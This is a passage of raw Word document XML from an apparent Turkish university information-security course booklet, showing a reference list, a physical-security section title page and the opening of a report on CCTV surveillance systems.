          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w: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Default="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00BC393C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="177" w:name="_Toc9949879"/>
      <w:r w:rsidRPr="00BC393C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>11. KAYNAKLAR</w:t>
      </w:r>
      <w:bookmarkEnd w:id="177"/>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0" w:history="1">
        <w:r w:rsidRPr="008604A3">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.burakeksi.com/iso-27001-bilgi-guvenliginde-fiziksel-ve-cevresel-guvenlik-1/</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1" w:history="1">
        <w:r w:rsidRPr="008604A3">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://www.cagataycebi.com/security/fiziksel_ve_cevresel_guvenlik.pdf</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2" w:history="1">
        <w:r w:rsidRPr="008604A3">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://ieeexplore.ieee.org/abstract/document/6523805</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3" w:history="1">
        <w:r w:rsidRPr="008604A3">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://ieeexplore.ieee.org/abstract/document/6141247</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4" w:history="1">
        <w:r w:rsidRPr="008604A3">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://www.sgaguvenlik.com/hizmetlerimiz/guvenlik-teknolojileri/fiziki-guvenlik-ve-guvenlik-teknolojileri/</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5" w:history="1">
        <w:r w:rsidRPr="008604A3">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.guvenlikonline.com/makale/212/-erisim-kontrol-sistemleri-kullanmak-icin-7-onemli-neden.html</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6" w:history="1">
        <w:r w:rsidRPr="008604A3">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.guvenliweb.org.tr/dosya/sds57.pdf</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7" w:history="1">
        <w:r w:rsidRPr="008604A3">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://www.udhb.gov.tr/images/hizlierisim/efcecbe1f21e9fe.pdf</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hyperlink r:id="rId178" w:history="1">
        <w:r w:rsidRPr="008604A3">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId179" w:history="1">
        <w:r w:rsidRPr="008604A3">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>bilgiguvenligi.saglik.gov.tr/files/BilgiG%C3%BCvenli%C4%9FiPolitikalar%C4%B1K%C4%B1lavuzu.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008604A3" w:rsidRDefault="00E77DF4" w:rsidP="007C7991">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>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Information Security Management Handbook</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008604A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008604A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008604A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008604A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008604A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008604A3"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p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008604A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>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 w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="004941F0">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="302487AF" wp14:editId="04761FD7">
            <wp:extent cx="3076575" cy="2714625"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="4128" name="Resim 1" descr="C:\Users\Asiye\Desktop\Mikrodenetleyici\deney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e\Desktop\Mikrodenetleyici\deney2\images.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId180" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3076575" cy="2714625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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ATATÜRK ÜNİVERSİTESİ</w:t>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MÜHENDİSLİK FAKÜLTESİ</w:t>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BİLGİSAYAR MÜHENDİSLİĞİ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="009B08C5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:right="-273"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00EB3B81" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:right="-273"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB3B81">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Bilgisayar Bilgi Güvenliği ve Yönetimi  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:right="-273"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>FİZİKSEL GÜVENLİK</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008718A4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:right="-273"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Section:10.1.4-10.2.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008718A4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:right="-293"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008718A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Prof.Dr. A.Samet HAŞILOĞLU</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008718A4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:right="-293"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008718A4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:right="-293"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008718A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Proje Yürütücü</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>sü</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:line="200" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008718A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">                                  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="1416" w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00902C97">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1507070</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>49</w:t>
      </w:r>
      <w:r w:rsidRPr="00902C97">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Fadime KARADAŞ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="1416" w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="1416" w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="1416" w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00EB3B81" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="1416" w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A27B52">
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Closed-Circuit Television and Video Surveillance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D20392" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D20392">
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20392">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Kapalı Devre Televizyon ve Video İzleme)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005B6F3F" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B6F3F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Özet:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D20392" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="0E2430"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D20392">
        <w:rPr>
          <w:color w:val="0E2430"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>20. yüzyılın ortalarında hassas ve gizli hükümet projelerinde kullanılmak üzere tasarlanan </w:t>
      </w:r>
      <w:r w:rsidRPr="00D20392">
        <w:rPr>
          <w:rStyle w:val="Gl"/>
          <w:color w:val="0E2430"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CCTV</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20392">
        <w:rPr>
          <w:color w:val="0E2430"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, günümüzün TV teknolojine kıyasla ilkel denilebilecek televizyon kameraları ve manyetik depolama  günlerinden bu yana çok uzun bir yol katetti. CCTV ilk olarak 1970'lerin sonunda geliştirildi ve başlangıçta bankalar gibi yüksek riskli güvenlik uygulamalarıyla sınırlıydı. Günümüzde ise perakendeden stadyumlara oldukça geniş bir kullanım alanı var.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005B6F3F" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="0E2430"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B6F3F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="0E2430"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Giriş:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="0E2430"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D20392">
        <w:rPr>
          <w:color w:val="0E2430"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CCTV “Close Circuit TeleVision” baş harflerinin kısaltmasından oluşmuş bir terimdir. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D20392">
        <w:rPr>
          <w:rStyle w:val="Gl"/>
          <w:color w:val="0E2430"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CCTV açılımı</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20392">
        <w:rPr>
          <w:color w:val="0E2430"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>  Kapalı Devre Televizyon anlamına gelir. CCTV sistemi videonun iletildiği devrelerin kapalı olduğu ve tüm unsurların (kamera, ekran monitörleri, kayıt cihazları) sisteme doğrudan bağlı olduğu bir sistemi ifade eder.Sistem, kapalı devre tasarımında olduğu gibi dışarıdan kimsenin erişemediği bir devredir ve karasal televizyon yayınından farklıdır. Çünkü sinyaller herkesin erişimine açık değildir. Video akışları yalnızca yetkili kullanıcılar tarafından kullanılabilir.Günümüzün gelişmiş </w:t>
      </w:r>
      <w:r w:rsidRPr="00D20392">
        <w:rPr>
          <w:rStyle w:val="Gl"/>
          <w:color w:val="0E2430"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CCTV sistemleri</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20392">
        <w:rPr>
          <w:color w:val="0E2430"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> ise yüksek çözünürlük, kablosuz iletişim, dijital optik, analiz yazılımları ve dijital depolama seçenekleri gibi dijital teknolojideki gelişmeler sayesinde, eski CCTV sistemlerinden çok farklı. Seçilen modele bağlı olarak yeni nesil yüksek çözünürlüklü kameraların birçoğunda gece görüşü için, kızılötesine kesintisiz geçiş yapan IR teknolojisi bulunuyor. Yüksek çözünürlüklü görüntülerle artık bir hırsızın sadece ne renk kıyafet giydiğini değil, kıyafetinin logosuna kadar en ince ayrıntıları bile tespit edilebilir. Kablosuz iletişim ile kameralara dünyanın herhangi bir yerinden, herhangi bir zamanda bir uygulama üzerinden erişim ve kontrol sağlanabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="0E2430"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005B6F3F"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212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B6F3F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Neden CCTV?</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eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D20392" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
